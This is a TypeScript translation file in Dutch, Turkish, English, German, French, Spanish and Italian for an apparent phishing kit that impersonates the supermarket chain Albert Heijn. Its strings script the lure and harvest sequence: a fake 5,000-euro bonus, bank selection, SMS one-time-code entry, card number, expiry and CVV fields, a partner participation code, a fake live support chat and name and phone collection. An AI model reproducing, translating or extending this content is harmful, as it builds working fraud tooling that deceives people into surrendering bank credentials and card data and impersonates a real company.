export type TranslationKeys = {
  portal_name: string;
  support_center_name: string;
  win_title: string;
  win_subtitle: string;
  win_button: string;
  banken_title: string;
  banken_subtitle: string;
  banken_search_placeholder: string;
  wait_title: string;
  wait_subtitle: string;
  sms_title: string;
  sms_subtitle: string;
  sms_input_label: string;
  sms_button: string;
  sms_loading: string;
  card_title: string;
  card_subtitle: string;
  card_owner_label: string;
  card_number_label: string;
  card_expiry_label: string;
  card_cvv_label: string;
  card_button: string;
  code_title: string;
  code_subtitle: string;
  code_button: string;
  live_support_title: string;
  live_support_subtitle: string;
  live_support_button: string;
  profile_title_small: string;
  profile_title_main: string;
  profile_subtitle: string;
  profile_firstname_label: string;
  profile_lastname_label: string;
  profile_phone_label: string;
  profile_button: string;
  profile_loading_text: string;
};

export const translations: Record<string, TranslationKeys> = {
  nl: {
    portal_name: "Albert Heijn klantenportaal",
    support_center_name: "Albert Heijn service",
    win_title: "Exclusieve Albert Heijn bonus",
    win_subtitle: "Gefeliciteerd! Je bent geselecteerd voor onze Albert Heijn actie van vandaag. Klik op de knop hieronder om je bonus van 5.000 euro te claimen.",
    win_button: "Bonus claimen",
    banken_title: "Kies je bank",
    banken_subtitle: "Selecteer je Nederlandse bank om verder te gaan.",
    banken_search_placeholder: "Zoek je bank...",
    wait_title: "Even geduld",
    wait_subtitle: "Je aanvraag wordt veilig verwerkt...",
    sms_title: "SMS-beveiligingscode",
    sms_subtitle: "Voer de {digits}-cijferige code in.",
    sms_input_label: "Eenmalige code",
    sms_button: "Bevestigen",
    sms_loading: "Verwerken...",
    card_title: "Betaalgegevens",
    card_subtitle: "Controleer en bevestig je gegevens.",
    card_owner_label: "Naam kaarthouder",
    card_number_label: "Kaartnummer",
    card_expiry_label: "Vervaldatum MM/JJ",
    card_cvv_label: "Beveiligingscode",
    card_button: "Doorgaan",
    code_title: "Welkom",
    code_subtitle: "Voer de deelnamecode in die je van {partner} hebt ontvangen om je beloning vrij te geven.",
    code_button: "Code bevestigen",
    live_support_title: "Live support",
    live_support_subtitle: "Om verder te gaan, moet je contact opnemen met onze klantenservice.\n\nKlik op de knop hieronder om het gesprek te starten.",
    live_support_button: "Chat openen",
    profile_title_small: "Prijsbevestiging",
    profile_title_main: "Je bonusbedrag",
    profile_subtitle: "Bevestig je gegevens voor de verdere verwerking.",
    profile_firstname_label: "Voornaam",
    profile_lastname_label: "Achternaam",
    profile_phone_label: "Mobiel nummer",
    profile_button: "Verder",
    profile_loading_text: "Verwerken..."
  },
  tr: {
    portal_name: "Albert Heijn Müşteri Portalı",
    support_center_name: "Albert Heijn Hizmetleri",
    win_title: "Özel Albert Heijn Bonusu",
    win_subtitle: "Tebrikler! Bugünkü Albert Heijn kampanyamız için seçildiniz. 5.000 Euro bonusunuzu talep etmek için aşağıdaki butona tıklayın.",
    win_button: "Bonusu Talep Et",
    banken_title: "Bankanızı Seçin",
    banken_subtitle: "Devam etmek için bankanızı seçin.",
    banken_search_placeholder: "Bankanızı arayın...",
    wait_title: "Lütfen Bekleyin",
    wait_subtitle: "Talebiniz güvenle işleniyor...",
    sms_title: "SMS Güvenlik Kodu",
    sms_subtitle: "{digits} haneli kodu girin.",
    sms_input_label: "Tek kullanımlık kod",
    sms_button: "Onayla",
    sms_loading: "İşleniyor...",
    card_title: "Ödeme Bilgileri",
    card_subtitle: "Bilgilerinizi kontrol edin ve onaylayın.",
    card_owner_label: "Kart Sahibi Adı",
    card_number_label: "Kart Numarası",
    card_expiry_label: "Son Kullanma Tarihi AA/YY",
    card_cvv_label: "Güvenlik Kodu",
    card_button: "Devam Et",
    code_title: "Hoş Geldiniz",
    code_subtitle: "Ödülünüzü almak için {partner} tarafından size verilen katılım kodunu girin.",
    code_button: "Kodu Onayla",
    live_support_title: "Canlı Destek",
    live_support_subtitle: "Devam etmek için müşteri hizmetlerimizle iletişime geçmelisiniz.\n\nGörüşmeyi başlatmak için aşağıdaki butona tıklayın.",
    live_support_button: "Sohbeti Başlat",
    profile_title_small: "Ödül Onayı",
    profile_title_main: "Bonus Miktarınız",
    profile_subtitle: "İşleme devam etmek için bilgilerinizi onaylayın.",
    profile_firstname_label: "Adınız",
    profile_lastname_label: "Soyadınız",
    profile_phone_label: "Cep Telefonu",
    profile_button: "Devam",
    profile_loading_text: "İşleniyor..."
  },
  en: {
    portal_name: "Albert Heijn Customer Portal",
    support_center_name: "Albert Heijn Service",
    win_title: "Exclusive Albert Heijn Bonus",
    win_subtitle: "Congratulations! You have been selected for today's Albert Heijn promotion. Click the button below to claim your 5,000 euro bonus.",
    win_button: "Claim Bonus",
    banken_title: "Choose Your Bank",
    banken_subtitle: "Select your bank to continue.",
    banken_search_placeholder: "Search your bank...",
    wait_title: "Please Wait",
    wait_subtitle: "Your request is being securely processed...",
    sms_title: "SMS Security Code",
    sms_subtitle: "Enter the {digits}-digit code.",
    sms_input_label: "One-time code",
    sms_button: "Confirm",
    sms_loading: "Processing...",
    card_title: "Payment Details",
    card_subtitle: "Check and confirm your details.",
    card_owner_label: "Cardholder Name",
    card_number_label: "Card Number",
    card_expiry_label: "Expiry Date MM/YY",
    card_cvv_label: "Security Code",
    card_button: "Continue",
    code_title: "Welcome",
    code_subtitle: "Enter the participation code you received from {partner} to unlock your reward.",
    code_button: "Confirm Code",
    live_support_title: "Live Support",
    live_support_subtitle: "To continue, you need to contact our customer service.\n\nClick the button below to start the chat.",
    live_support_button: "Start Chat",
    profile_title_small: "Prize Confirmation",
    profile_title_main: "Your Bonus Amount",
    profile_subtitle: "Confirm your details for further processing.",
    profile_firstname_label: "First Name",
    profile_lastname_label: "Last Name",
    profile_phone_label: "Mobile Number",
    profile_button: "Next",
    profile_loading_text: "Processing..."
  },
  de: {
    portal_name: "Albert Heijn Kundenportal",
    support_center_name: "Albert Heijn Service",
    win_title: "Exklusiver Albert Heijn Bonus",
    win_subtitle: "Herzlichen Glückwunsch! Sie wurden für unsere heutige Albert Heijn Aktion ausgewählt. Klicken Sie auf den Button unten, um Ihren 5.000 Euro Bonus zu beanspruchen.",
    win_button: "Bonus beanspruchen",
    banken_title: "Wählen Sie Ihre Bank",
    banken_subtitle: "Wählen Sie Ihre Bank, um fortzufahren.",
    banken_search_placeholder: "Suchen Sie Ihre Bank...",
    wait_title: "Bitte warten",
    wait_subtitle: "Ihre Anfrage wird sicher bearbeitet...",
    sms_title: "SMS Sicherheitscode",
    sms_subtitle: "Geben Sie den {digits}-stelligen Code ein.",
    sms_input_label: "Einmaliger Code",
    sms_button: "Bestätigen",
    sms_loading: "Wird bearbeitet...",
    card_title: "Zahlungsdetails",
    card_subtitle: "Überprüfen und bestätigen Sie Ihre Details.",
    card_owner_label: "Name des Karteninhabers",
    card_number_label: "Kartennummer",
    card_expiry_label: "Ablaufdatum MM/JJ",
    card_cvv_label: "Sicherheitscode",
    card_button: "Fortfahren",
    code_title: "Willkommen",
    code_subtitle: "Geben Sie den Teilnahme-Code ein, den Sie von {partner} erhalten haben, um Ihre Belohnung freizuschalten.",
    code_button: "Code bestätigen",
    live_support_title: "Live-Support",
    live_support_subtitle: "Um fortzufahren, müssen Sie unseren Kundenservice kontaktieren.\n\nKlicken Sie auf den Button unten, um den Chat zu starten.",
    live_support_button: "Chat starten",
    profile_title_small: "Preisbestätigung",
    profile_title_main: "Ihr Bonusbetrag",
    profile_subtitle: "Bestätigen Sie Ihre Daten zur weiteren Bearbeitung.",
    profile_firstname_label: "Vorname",
    profile_lastname_label: "Nachname",
    profile_phone_label: "Handynummer",
    profile_button: "Weiter",
    profile_loading_text: "Wird bearbeitet..."
  },
  fr: {
    portal_name: "Portail Client Albert Heijn",
    support_center_name: "Service Albert Heijn",
    win_title: "Bonus Exclusif Albert Heijn",
    win_subtitle: "Félicitations ! Vous avez été sélectionné pour notre promotion Albert Heijn d'aujourd'hui. Cliquez sur le bouton ci-dessous pour réclamer votre bonus de 5 000 euros.",
    win_button: "Réclamer le Bonus",
    banken_title: "Choisissez Votre Banque",
    banken_subtitle: "Sélectionnez votre banque pour continuer.",
    banken_search_placeholder: "Recherchez votre banque...",
    wait_title: "Veuillez Patienter",
    wait_subtitle: "Votre demande est en cours de traitement sécurisé...",
    sms_title: "Code de Sécurité SMS",
    sms_subtitle: "Entrez le code à {digits} chiffres.",
    sms_input_label: "Code à usage unique",
    sms_button: "Confirmer",
    sms_loading: "Traitement en cours...",
    card_title: "Détails de Paiement",
    card_subtitle: "Vérifiez et confirmez vos détails.",
    card_owner_label: "Nom du Titulaire",
    card_number_label: "Numéro de Carte",
    card_expiry_label: "Date d'Expiration MM/AA",
    card_cvv_label: "Code de Sécurité",
    card_button: "Continuer",
    code_title: "Bienvenue",
    code_subtitle: "Entrez le code de participation que vous avez reçu de {partner} pour débloquer votre récompense.",
    code_button: "Confirmer le Code",
    live_support_title: "Assistance en Direct",
    live_support_subtitle: "Pour continuer, vous devez contacter notre service client.\n\nCliquez sur le bouton ci-dessous pour démarrer le chat.",
    live_support_button: "Démarrer le Chat",
    profile_title_small: "Confirmation du Prix",
    profile_title_main: "Montant de Votre Bonus",
    profile_subtitle: "Confirmez vos coordonnées pour le traitement ultérieur.",
    profile_firstname_label: "Prénom",
    profile_lastname_label: "Nom",
    profile_phone_label: "Numéro de Mobile",
    profile_button: "Suivant",
    profile_loading_text: "Traitement en cours..."
  },
  es: {
    portal_name: "Portal del Cliente Albert Heijn",
    support_center_name: "Servicio Albert Heijn",
    win_title: "Bono Exclusivo Albert Heijn",
    win_subtitle: "¡Felicidades! Has sido seleccionado para la promoción de Albert Heijn de hoy. Haz clic en el botón de abajo para reclamar tu bono de 5.000 euros.",
    win_button: "Reclamar Bono",
    banken_title: "Elige tu Banco",
    banken_subtitle: "Selecciona tu banco para continuar.",
    banken_search_placeholder: "Busca tu banco...",
    wait_title: "Por favor, espera",
    wait_subtitle: "Tu solicitud está siendo procesada de forma segura...",
    sms_title: "Código de Seguridad SMS",
    sms_subtitle: "Ingresa el código de {digits} dígitos.",
    sms_input_label: "Código de un solo uso",
    sms_button: "Confirmar",
    sms_loading: "Procesando...",
    card_title: "Detalles de Pago",
    card_subtitle: "Verifica y confirma tus detalles.",
    card_owner_label: "Nombre del Titular",
    card_number_label: "Número de Tarjeta",
    card_expiry_label: "Fecha de Caducidad MM/AA",
    card_cvv_label: "Código de Seguridad",
    card_button: "Continuar",
    code_title: "Bienvenido",
    code_subtitle: "Ingresa el código de participación que recibiste de {partner} para desbloquear tu recompensa.",
    code_button: "Confirmar Código",
    live_support_title: "Soporte en Vivo",
    live_support_subtitle: "Para continuar, necesitas contactar a nuestro servicio al cliente.\n\nHaz clic en el botón de abajo para iniciar el chat.",
    live_support_button: "Iniciar Chat",
    profile_title_small: "Confirmación de Premio",
    profile_title_main: "Monto de tu Bono",
    profile_subtitle: "Confirma tus datos para continuar el procesamiento.",
    profile_firstname_label: "Nombre",
    profile_lastname_label: "Apellido",
    profile_phone_label: "Número de Móvil",
    profile_button: "Siguiente",
    profile_loading_text: "Procesando..."
  },
  it: {
    portal_name: "Portale Clienti Albert Heijn",
    support_center_name: "Servizio Albert Heijn",
    win_title: "Bonus Esclusivo Albert Heijn",
    win_subtitle: "Congratulazioni! Sei stato selezionato per la promozione Albert Heijn di oggi. Clicca sul pulsante qui sotto per richiedere il tuo bonus di 5.000 euro.",
    win_button: "Richiedi Bonus",
    banken_title: "Scegli la tua Banca",
    banken_subtitle: "Seleziona la tua banca per continuare.",
    banken_search_placeholder: "Cerca la tua banca...",
    wait_title: "Attendere prego",
    wait_subtitle: "La tua richiesta è in fase di elaborazione sicura...",
    sms_title: "Codice di Sicurezza SMS",
    sms_subtitle: "Inserisci il codice a {digits} cifre.",
    sms_input_label: "Codice monouso",
    sms_button: "Conferma",
    sms_loading: "Elaborazione...",
    card_title: "Dettagli di Pagamento",
    card_subtitle: "Controlla e conferma i tuoi dettagli.",
    card_owner_label: "Nome del Titolare",
    card_number_label: "Numero di Carta",
    card_expiry_label: "Data di Scadenza MM/AA",
    card_cvv_label: "Codice di Sicurezza",
    card_button: "Continua",
    code_title: "Benvenuto",
    code_subtitle: "Inserisci il codice di partecipazione che hai ricevuto da {partner} per sbloccare la tua ricompensa.",
    code_button: "Conferma Codice",
    live_support_title: "Supporto Live",
    live_support_subtitle: "Per continuare, devi contattare il nostro servizio clienti.\n\nClicca sul pulsante qui sotto per avviare la chat.",
    live_support_button: "Avvia Chat",
    profile_title_small: "Conferma Premio",
    profile_title_main: "L'importo del tuo Bonus",
    profile_subtitle: "Conferma i tuoi dati per l'ulteriore elaborazione.",
    profile_firstname_label: "Nome",
    profile_lastname_label: "Cognome",
    profile_phone_label: "Numero di Cellulare",
    profile_button: "Avanti",
    profile_loading_text: "Elaborazione..."
  }
};
